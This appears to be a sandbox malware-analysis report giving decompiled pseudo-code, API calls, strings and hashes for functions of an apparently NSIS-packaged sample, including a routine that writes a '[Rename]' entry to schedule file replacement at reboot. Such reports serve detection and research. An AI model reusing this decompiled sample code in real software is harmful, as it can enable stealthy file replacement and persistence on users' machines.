							 *((intOrPtr*)( *_t80 + 0x24))(_t80, L"C:\\Users\\jones\\AppData\\Local\\Microsoft\\Windows\\INetCache\\spilplatform\\Thenceforth");
						}
						if(_t105 != _t83) {
							_t78 =  *((intOrPtr*)(_t107 + 8));
							 *((intOrPtr*)( *_t78 + 0x3c))(_t78, _t105);
						}
						_t66 =  *((intOrPtr*)(_t107 + 8));
						 *((intOrPtr*)( *_t66 + 0x34))(_t66,  *(_t107 - 0x38));
						_t91 =  *((intOrPtr*)(_t107 - 0x48));
						if( *_t91 != _t83) {
							_t76 =  *((intOrPtr*)(_t107 + 8));
							 *((intOrPtr*)( *_t76 + 0x44))(_t76, _t91,  *(_t107 - 0x44));
						}
						_t68 =  *((intOrPtr*)(_t107 + 8));
						 *((intOrPtr*)( *_t68 + 0x2c))(_t68,  *((intOrPtr*)(_t107 - 8)));
						_t70 =  *((intOrPtr*)(_t107 + 8));
						 *((intOrPtr*)( *_t70 + 0x1c))(_t70,  *((intOrPtr*)(_t107 - 0xc)));
						if( *((intOrPtr*)(_t107 - 0x10)) >= _t83) {
							_t74 =  *((intOrPtr*)(_t107 - 0x30));
							 *((intOrPtr*)(_t107 - 0x10)) =  *((intOrPtr*)( *_t74 + 0x18))(_t74,  *((intOrPtr*)(_t107 - 0x4c)), 1);
						}
						_t72 =  *((intOrPtr*)(_t107 - 0x30));
						 *((intOrPtr*)( *_t72 + 8))(_t72);
					}
					_t62 =  *((intOrPtr*)(_t107 + 8));
					 *((intOrPtr*)( *_t62 + 8))(_t62);
					if( *((intOrPtr*)(_t107 - 0x10)) >= _t83) {
						_push(0xfffffff4);
					} else {
						goto L14;
					}
				}
				E00401423();
				 *0x42a2a8 =  *0x42a2a8 +  *((intOrPtr*)(_t107 - 4));
				return 0;
			}






















                                                        0x00402107
                                                        0x00402111
                                                        0x0040211b
                                                        0x00402125
                                                        0x00402130
                                                        0x00402133
                                                        0x0040214d
                                                        0x00402150
                                                        0x00402156
                                                        0x00402159
                                                        0x00402163
                                                        0x00402167
                                                        0x00402167
                                                        0x0040216c
                                                        0x0040217d
                                                        0x00402185
                                                        0x0040223c
                                                        0x0040223c
                                                        0x00402243
                                                        0x0040218b
                                                        0x0040218b
                                                        0x0040219a
                                                        0x0040219e
                                                        0x004021a1
                                                        0x004021a7
                                                        0x004021b5
                                                        0x004021b8
                                                        0x004021ba
                                                        0x004021c5
                                                        0x004021c5
                                                        0x004021ca
                                                        0x004021cc
                                                        0x004021d3
                                                        0x004021d3
                                                        0x004021d6
                                                        0x004021df
                                                        0x004021e2
                                                        0x004021e8
                                                        0x004021ea
                                                        0x004021f4
                                                        0x004021f4
                                                        0x004021f7
                                                        0x00402200
                                                        0x00402203
                                                        0x0040220c
                                                        0x00402212
                                                        0x00402214
                                                        0x00402222
                                                        0x00402222
                                                        0x00402225
                                                        0x0040222b
                                                        0x0040222b
                                                        0x0040222e
                                                        0x00402234
                                                        0x0040223a
                                                        0x0040224f
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x0040223a
                                                        0x00402245
                                                        0x00402ac2
                                                        0x00402ace

                                                        APIs
                                                        • CoCreateInstance.OLE32(004084DC,?,00000001,004084CC,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 0040217D
                                                        Strings
                                                        • C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\spilplatform\Thenceforth, xrefs: 004021BD
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.840698964.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.840692098.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840709205.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.0000000000422000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.0000000000425000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.0000000000427000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.000000000042D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.0000000000435000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.000000000044E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840784743.0000000000450000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840784743.0000000000460000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840784743.0000000000469000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840784743.000000000046F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_u5p3.jbxd
                                                        Similarity
                                                        • API ID: CreateInstance
                                                        • String ID: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\spilplatform\Thenceforth
                                                        • API String ID: 542301482-3281557333
                                                        • Opcode ID: 6a73a02503d44bb31e679befed85152b1616c559738105c0cf9dadfb40333c17
                                                        • Instruction ID: 8d58e3acc7b173ba9b06918936dfe92dd1a067fa61399e551ad1d720d45e9931
                                                        • Opcode Fuzzy Hash: 6a73a02503d44bb31e679befed85152b1616c559738105c0cf9dadfb40333c17
                                                        • Instruction Fuzzy Hash: A64148B5A00208AFCB10DFE4C988AAEBBB5FF48314F20457AF515EB2D1DB799941CB44
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00402862 Relevance: 1.5, APIs: 1, Instructions: 30fileCOMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 39%
                                                        			E00402862(short __ebx, short* __esi) {
				void* _t21;

				if(FindFirstFileW(E00402C37(2), _t21 - 0x2d4) != 0xffffffff) {
					E00406193( *((intOrPtr*)(_t21 - 0xc)), _t8);
					_push(_t21 - 0x2a8);
					_push(__esi);
					E0040624C();
				} else {
					 *((short*)( *((intOrPtr*)(_t21 - 0xc)))) = __ebx;
					 *__esi = __ebx;
					 *((intOrPtr*)(_t21 - 4)) = 1;
				}
				 *0x42a2a8 =  *0x42a2a8 +  *((intOrPtr*)(_t21 - 4));
				return 0;
			}




                                                        0x0040287a
                                                        0x00402895
                                                        0x004028a0
                                                        0x004028a1
                                                        0x004029db
                                                        0x0040287c
                                                        0x0040287f
                                                        0x00402882
                                                        0x00402885
                                                        0x00402885
                                                        0x00402ac2
                                                        0x00402ace

                                                        APIs
                                                        • FindFirstFileW.KERNEL32(00000000,?,00000002), ref: 00402871
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.840698964.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.840692098.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840709205.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.0000000000422000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.0000000000425000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.0000000000427000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.000000000042D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.0000000000435000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.000000000044E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840784743.0000000000450000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840784743.0000000000460000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840784743.0000000000469000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840784743.000000000046F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_u5p3.jbxd
                                                        Similarity
                                                        • API ID: FileFindFirst
                                                        • String ID:
                                                        • API String ID: 1974802433-0
                                                        • Opcode ID: 4dcabbf17ade67e2922ca78fe286c3d9ba2f9d985751f28a6fa0d9db42db9f20
                                                        • Instruction ID: 457e94eee93b26a2a7a920d72ffedce9eee0ef57ab85e6e0c0e07cda1b0ec514
                                                        • Opcode Fuzzy Hash: 4dcabbf17ade67e2922ca78fe286c3d9ba2f9d985751f28a6fa0d9db42db9f20
                                                        • Instruction Fuzzy Hash: 72F08271A04104EFD710EBA4DD49AADB378EF00314F2045BBF911F21D1D7B44E409B2A
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0040437E Relevance: 37.0, APIs: 19, Strings: 2, Instructions: 204windowstringCOMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 91%
                                                        			E0040437E(struct HWND__* _a4, int _a8, unsigned int _a12, WCHAR* _a16) {
				intOrPtr _v8;
				int _v12;
				void* _v16;
				struct HWND__* _t56;
				intOrPtr _t69;
				signed int _t75;
				signed short* _t76;
				signed short* _t78;
				long _t92;
				int _t103;
				signed int _t110;
				intOrPtr _t113;
				WCHAR* _t114;
				signed int* _t116;
				WCHAR* _t117;
				struct HWND__* _t118;

				if(_a8 != 0x110) {
					if(_a8 != 0x111) {
						L13:
						if(_a8 != 0x4e) {
							if(_a8 == 0x40b) {
								 *0x4216b4 =  *0x4216b4 + 1;
							}
							L27:
							_t114 = _a16;
							L28:
							return E00404248(_a8, _a12, _t114);
						}
						_t56 = GetDlgItem(_a4, 0x3e8);
						_t114 = _a16;
						if( *((intOrPtr*)(_t114 + 8)) == 0x70b &&  *((intOrPtr*)(_t114 + 0xc)) == 0x201) {
							_t103 =  *((intOrPtr*)(_t114 + 0x1c));
							_t113 =  *((intOrPtr*)(_t114 + 0x18));
							_v12 = _t103;
							_v16 = _t113;
							_v8 = 0x4281a0;
							if(_t103 - _t113 < 0x800) {
								SendMessageW(_t56, 0x44b, 0,  &_v16);
								SetCursor(LoadCursorW(0, 0x7f02));
								_push(1);
								E0040462D(_a4, _v8);
								SetCursor(LoadCursorW(0, 0x7f00));
								_t114 = _a16;
							}
						}
						if( *((intOrPtr*)(_t114 + 8)) != 0x700 ||  *((intOrPtr*)(_t114 + 0xc)) != 0x100) {
							goto L28;
						} else {
							if( *((intOrPtr*)(_t114 + 0x10)) == 0xd) {
								SendMessageW( *0x42a208, 0x111, 1, 0);
							}
							if( *((intOrPtr*)(_t114 + 0x10)) == 0x1b) {
								SendMessageW( *0x42a208, 0x10, 0, 0);
							}
							return 1;
						}
					}
					if(_a12 >> 0x10 != 0 ||  *0x4216b4 != 0) {
						goto L27;
					} else {
						_t69 =  *0x4226c0; // 0x72fd3c
						_t29 = _t69 + 0x14; // 0x72fd50
						_t116 = _t29;
						if(( *_t116 & 0x00000020) == 0) {
							goto L27;
						}
						 *_t116 =  *_t116 & 0xfffffffe | SendMessageW(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001;
						E00404203(SendMessageW(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001);
						E00404609();
						goto L13;
					}
				}
				_t117 = _a16;
				_t75 =  *(_t117 + 0x30);
				if(_t75 < 0) {
					_t75 =  *( *0x4291dc - 4 + _t75 * 4);
				}
				_t76 =  *0x42a258 + _t75 * 2;
				_t110 =  *_t76 & 0x0000ffff;
				_a8 = _t110;
				_t78 =  &(_t76[1]);
				_a16 = _t78;
				_v16 = _t78;
				_v12 = 0;
				_v8 = E0040432F;
				if(_t110 != 2) {
					_v8 = E004042F5;
				}
				_push( *((intOrPtr*)(_t117 + 0x34)));
				_push(0x22);
				E004041E1(_a4);
				_push( *((intOrPtr*)(_t117 + 0x38)));
				_push(0x23);
				E004041E1(_a4);
				CheckDlgButton(_a4, (0 | ( !( *(_t117 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t117 + 0x14) & 0x00000001) == 0x00000000) + 0x40a, 1);
				E00404203( !( *(_t117 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t117 + 0x14) & 0x00000001);
				_t118 = GetDlgItem(_a4, 0x3e8);
				E00404216(_t118);
				SendMessageW(_t118, 0x45b, 1, 0);
				_t92 =  *( *0x42a214 + 0x68);
				if(_t92 < 0) {
					_t92 = GetSysColor( ~_t92);
				}
				SendMessageW(_t118, 0x443, 0, _t92);
				SendMessageW(_t118, 0x445, 0, 0x4010000);
				SendMessageW(_t118, 0x435, 0, lstrlenW(_a16));
				 *0x4216b4 = 0;
				SendMessageW(_t118, 0x449, _a8,  &_v16);
				 *0x4216b4 = 0;
				return 0;
			}



















                                                        0x00404390
                                                        0x004044bd
                                                        0x0040451a
                                                        0x0040451e
                                                        0x004045eb
                                                        0x004045ed
                                                        0x004045ed
                                                        0x004045f3
                                                        0x004045f3
                                                        0x004045f6
                                                        0x00000000
                                                        0x004045fd
                                                        0x0040452c
                                                        0x00404532
                                                        0x0040453c
                                                        0x00404547
                                                        0x0040454a
                                                        0x0040454d
                                                        0x00404558
                                                        0x0040455b
                                                        0x00404562
                                                        0x0040456f
                                                        0x00404580
                                                        0x00404586
                                                        0x0040458e
                                                        0x0040459c
                                                        0x004045a2
                                                        0x004045a2
                                                        0x00404562
                                                        0x004045ac
                                                        0x00000000
                                                        0x004045b7
                                                        0x004045bb
                                                        0x004045cb
                                                        0x004045cb
                                                        0x004045d1
                                                        0x004045dd
                                                        0x004045dd
                                                        0x00000000
                                                        0x004045e1
                                                        0x004045ac
                                                        0x004044c8
                                                        0x00000000
                                                        0x004044da
                                                        0x004044da
                                                        0x004044df
                                                        0x004044df
                                                        0x004044e5
                                                        0x00000000
                                                        0x00000000
                                                        0x0040450e
                                                        0x00404510
                                                        0x00404515
                                                        0x00000000
                                                        0x00404515
                                                        0x004044c8
                                                        0x00404396
                                                        0x00404399
                                                        0x0040439e
                                                        0x004043af
                                                        0x004043af
                                                        0x004043b7
                                                        0x004043ba
                                                        0x004043be
                                                        0x004043c1
                                                        0x004043c5
                                                        0x004043c8
                                                        0x004043cb
                                                        0x004043ce
                                                        0x004043d5
                                                        0x004043d7
                                                        0x004043d7
                                                        0x004043e1
                                                        0x004043ee
                                                        0x004043f8
                                                        0x004043fd
                                                        0x00404400
                                                        0x00404405
                                                        0x0040441c
                                                        0x00404423
                                                        0x00404436
                                                        0x00404439
                                                        0x0040444d
                                                        0x00404454
                                                        0x00404459
                                                        0x0040445e
                                                        0x0040445e
                                                        0x0040446c
                                                        0x0040447a
                                                        0x0040448c
                                                        0x00404491
                                                        0x004044a1
                                                        0x004044a3
                                                        0x00000000

                                                        APIs
                                                        • CheckDlgButton.USER32 ref: 0040441C
                                                        • GetDlgItem.USER32 ref: 00404430
                                                        • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 0040444D
                                                        • GetSysColor.USER32(?), ref: 0040445E
                                                        • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 0040446C
                                                        • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 0040447A
                                                        • lstrlenW.KERNEL32(?), ref: 0040447F
                                                        • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 0040448C
                                                        • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 004044A1
                                                        • GetDlgItem.USER32 ref: 004044FA
                                                        • SendMessageW.USER32(00000000), ref: 00404501
                                                        • GetDlgItem.USER32 ref: 0040452C
                                                        • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 0040456F
                                                        • LoadCursorW.USER32(00000000,00007F02), ref: 0040457D
                                                        • SetCursor.USER32(00000000), ref: 00404580
                                                        • LoadCursorW.USER32(00000000,00007F00), ref: 00404599
                                                        • SetCursor.USER32(00000000), ref: 0040459C
                                                        • SendMessageW.USER32(00000111,00000001,00000000), ref: 004045CB
                                                        • SendMessageW.USER32(00000010,00000000,00000000), ref: 004045DD
                                                        Strings
                                                        • C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Langust\Grade, xrefs: 0040455B
                                                        • N, xrefs: 0040451A
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.840698964.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.840692098.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840709205.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.0000000000422000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.0000000000425000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.0000000000427000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.000000000042D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.0000000000435000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.000000000044E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840784743.0000000000450000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840784743.0000000000460000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840784743.0000000000469000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840784743.000000000046F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_u5p3.jbxd
                                                        Similarity
                                                        • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
                                                        • String ID: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Langust\Grade$N
                                                        • API String ID: 3103080414-2667678293
                                                        • Opcode ID: 868c1d48af680dab98623212c2c2391fab089ac2f5c5a3188426b6b277364ed0
                                                        • Instruction ID: b1457f7914280a06e64b3deddd6598f3d1f5c62ed4ca7ede05d387843edeb913
                                                        • Opcode Fuzzy Hash: 868c1d48af680dab98623212c2c2391fab089ac2f5c5a3188426b6b277364ed0
                                                        • Instruction Fuzzy Hash: B96173B1A00209BFDB109F60DD45EAA7B69FB94344F00813AFB05B62E0D7789952DF59
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00401000 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 125COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 90%
                                                        			E00401000(struct HWND__* _a4, void* _a8, signed int _a12, void* _a16) {
				struct tagLOGBRUSH _v16;
				struct tagRECT _v32;
				struct tagPAINTSTRUCT _v96;
				struct HDC__* _t70;
				struct HBRUSH__* _t87;
				struct HFONT__* _t94;
				long _t102;
				signed int _t126;
				struct HDC__* _t128;
				intOrPtr _t130;

				if(_a8 == 0xf) {
					_t130 =  *0x42a214;
					_t70 = BeginPaint(_a4,  &_v96);
					_v16.lbStyle = _v16.lbStyle & 0x00000000;
					_a8 = _t70;
					GetClientRect(_a4,  &_v32);
					_t126 = _v32.bottom;
					_v32.bottom = _v32.bottom & 0x00000000;
					while(_v32.top < _t126) {
						_a12 = _t126 - _v32.top;
						asm("cdq");
						asm("cdq");
						asm("cdq");
						_v16.lbColor = 0 << 0x00000008 | (( *(_t130 + 0x50) & 0x000000ff) * _a12 + ( *(_t130 + 0x54) & 0x000000ff) * _v32.top) / _t126 & 0x000000ff;
						_t87 = CreateBrushIndirect( &_v16);
						_v32.bottom = _v32.bottom + 4;
						_a16 = _t87;
						FillRect(_a8,  &_v32, _t87);
						DeleteObject(_a16);
						_v32.top = _v32.top + 4;
					}
					if( *(_t130 + 0x58) != 0xffffffff) {
						_t94 = CreateFontIndirectW( *(_t130 + 0x34));
						_a16 = _t94;
						if(_t94 != 0) {
							_t128 = _a8;
							_v32.left = 0x10;
							_v32.top = 8;
							SetBkMode(_t128, 1);
							SetTextColor(_t128,  *(_t130 + 0x58));
							_a8 = SelectObject(_t128, _a16);
							DrawTextW(_t128, 0x429200, 0xffffffff,  &_v32, 0x820);
							SelectObject(_t128, _a8);
							DeleteObject(_a16);
						}
					}
					EndPaint(_a4,  &_v96);
					return 0;
				}
				_t102 = _a16;
				if(_a8 == 0x46) {
					 *(_t102 + 0x18) =  *(_t102 + 0x18) | 0x00000010;
					 *((intOrPtr*)(_t102 + 4)) =  *0x42a208;
				}
				return DefWindowProcW(_a4, _a8, _a12, _t102);
			}













                                                        0x0040100a
                                                        0x00401039
                                                        0x00401047
                                                        0x0040104d
                                                        0x00401051
                                                        0x0040105b
                                                        0x00401061
                                                        0x00401064
                                                        0x004010f3
                                                        0x00401089
                                                        0x0040108c
                                                        0x004010a6
                                                        0x004010bd
                                                        0x004010cc
                                                        0x004010cf
                                                        0x004010d5
                                                        0x004010d9
                                                        0x004010e4
                                                        0x004010ed
                                                        0x004010ef
                                                        0x004010ef
                                                        0x00401100
                                                        0x00401105
                                                        0x0040110d
                                                        0x00401110
                                                        0x00401112
                                                        0x00401118
                                                        0x0040111f
                                                        0x00401126
                                                        0x00401130
                                                        0x00401142
                                                        0x00401156
                                                        0x00401160
                                                        0x00401165
                                                        0x00401165
                                                        0x00401110
                                                        0x0040116e
                                                        0x00000000
                                                        0x00401178
                                                        0x00401010
                                                        0x00401013
                                                        0x00401015
                                                        0x0040101f
                                                        0x0040101f
                                                        0x00000000

                                                        APIs
                                                        • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                        • BeginPaint.USER32(?,?), ref: 00401047
                                                        • GetClientRect.USER32 ref: 0040105B
                                                        • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                        • FillRect.USER32 ref: 004010E4
                                                        • DeleteObject.GDI32(?), ref: 004010ED
                                                        • CreateFontIndirectW.GDI32(?), ref: 00401105
                                                        • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                        • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                        • SelectObject.GDI32(00000000,?), ref: 00401140
                                                        • DrawTextW.USER32(00000000,00429200,000000FF,00000010,00000820), ref: 00401156
                                                        • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                        • DeleteObject.GDI32(?), ref: 00401165
                                                        • EndPaint.USER32(?,?), ref: 0040116E
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.840698964.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.840692098.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840709205.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.0000000000422000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.0000000000425000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.0000000000427000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.000000000042D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.0000000000435000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.000000000044E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840784743.0000000000450000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840784743.0000000000460000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840784743.0000000000469000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840784743.000000000046F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_u5p3.jbxd
                                                        Similarity
                                                        • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                        • String ID: F
                                                        • API String ID: 941294808-1304234792
                                                        • Opcode ID: dddf6588841e3707deee37d13ddb8de347a630f4291ad0a352021d00e496f588
                                                        • Instruction ID: 53e7ac87f6412b54f62e8112edad18e9e8f6d31619aee210d26213a62ff7d26c
                                                        • Opcode Fuzzy Hash: dddf6588841e3707deee37d13ddb8de347a630f4291ad0a352021d00e496f588
                                                        • Instruction Fuzzy Hash: 88418A71800209AFCF058FA5DE459AF7BB9FF44310F00842AF991AA1A0C738D955DFA4
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00405E98 Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 130memorystringCOMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 100%
                                                        			E00405E98(void* __ecx) {
				void* __ebx;
				void* __edi;
				void* __esi;
				long _t12;
				long _t24;
				char* _t31;
				int _t37;
				void* _t38;
				intOrPtr* _t39;
				long _t42;
				WCHAR* _t44;
				void* _t46;
				void* _t48;
				void* _t49;
				void* _t52;
				void* _t53;

				_t38 = __ecx;
				_t44 =  *(_t52 + 0x14);
				 *0x426d88 = 0x55004e;
				 *0x426d8c = 0x4c;
				if(_t44 == 0) {
					L3:
					_t12 = GetShortPathNameW( *(_t52 + 0x1c), 0x427588, 0x400);
					if(_t12 != 0 && _t12 <= 0x400) {
						_t37 = wsprintfA(0x426988, "%ls=%ls\r\n", 0x426d88, 0x427588);
						_t53 = _t52 + 0x10;
						E0040626E(_t37, 0x400, 0x427588, 0x427588,  *((intOrPtr*)( *0x42a214 + 0x128)));
						_t12 = E00405D3E(0x427588, 0xc0000000, 4);
						_t48 = _t12;
						 *(_t53 + 0x18) = _t48;
						if(_t48 != 0xffffffff) {
							_t42 = GetFileSize(_t48, 0);
							_t6 = _t37 + 0xa; // 0xa
							_t46 = GlobalAlloc(0x40, _t42 + _t6);
							if(_t46 == 0 || E00405DC1(_t48, _t46, _t42) == 0) {
								L18:
								return CloseHandle(_t48);
							} else {
								if(E00405CA3(_t38, _t46, "[Rename]\r\n") != 0) {
									_t49 = E00405CA3(_t38, _t21 + 0xa, "\n[");
									if(_t49 == 0) {
										_t48 =  *(_t53 + 0x18);
										L16:
										_t24 = _t42;
										L17:
										E00405CF9(_t24 + _t46, 0x426988, _t37);
										SetFilePointer(_t48, 0, 0, 0);
										E00405DF0(_t48, _t46, _t42 + _t37);
										GlobalFree(_t46);
										goto L18;
									}
									_t39 = _t46 + _t42;
									_t31 = _t39 + _t37;
									while(_t39 > _t49) {
										 *_t31 =  *_t39;
										_t31 = _t31 - 1;
										_t39 = _t39 - 1;
									}
									_t24 = _t49 - _t46 + 1;
									_t48 =  *(_t53 + 0x18);
									goto L17;
								}
								lstrcpyA(_t46 + _t42, "[Rename]\r\n");
								_t42 = _t42 + 0xa;
								goto L16;
							}
						}
					}
				} else {
					CloseHandle(E00405D3E(_t44, 0, 1));
					_t12 = GetShortPathNameW(_t44, 0x426d88, 0x400);
					if(_t12 != 0 && _t12 <= 0x400) {
						goto L3;
					}
				}
				return _t12;
			}



















                                                        0x00405e98
                                                        0x00405ea1
                                                        0x00405ea8
                                                        0x00405eb2
                                                        0x00405ec6
                                                        0x00405eee
                                                        0x00405ef9
                                                        0x00405efd
                                                        0x00405f1d
                                                        0x00405f24
                                                        0x00405f2e
                                                        0x00405f3b
                                                        0x00405f40
                                                        0x00405f45
                                                        0x00405f49
                                                        0x00405f58
                                                        0x00405f5a
                                                        0x00405f67
                                                        0x00405f6b
                                                        0x00406006
                                                        0x00000000
                                                        0x00405f81
                                                        0x00405f8e
                                                        0x00405fb2
                                                        0x00405fb6
                                                        0x00405fd5
                                                        0x00405fd9
                                                        0x00405fd9
                                                        0x00405fdb
                                                        0x00405fe4
                                                        0x00405fef
                                                        0x00405ffa
                                                        0x00406000
                                                        0x00000000
                                                        0x00406000
                                                        0x00405fb8
                                                        0x00405fbb
                                                        0x00405fc6
                                                        0x00405fc2
                                                        0x00405fc4
                                                        0x00405fc5
                                                        0x00405fc5
                                                        0x00405fcd
                                                        0x00405fcf
                                                        0x00000000
                                                        0x00405fcf
                                                        0x00405f99
                                                        0x00405f9f
                                                        0x00000000
                                                        0x00405f9f
                                                        0x00405f6b
                                                        0x00405f49
                                                        0x00405ec8
                                                        0x00405ed3
                                                        0x00405edc
                                                        0x00405ee0
                                                        0x00000000
                                                        0x00000000
                                                        0x00405ee0
                                                        0x00406011

                                                        APIs
                                                        • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,?,00406033,?,?), ref: 00405ED3
                                                        • GetShortPathNameW.KERNEL32 ref: 00405EDC
                                                          • Part of subcall function 00405CA3: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405F8C,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405CB3
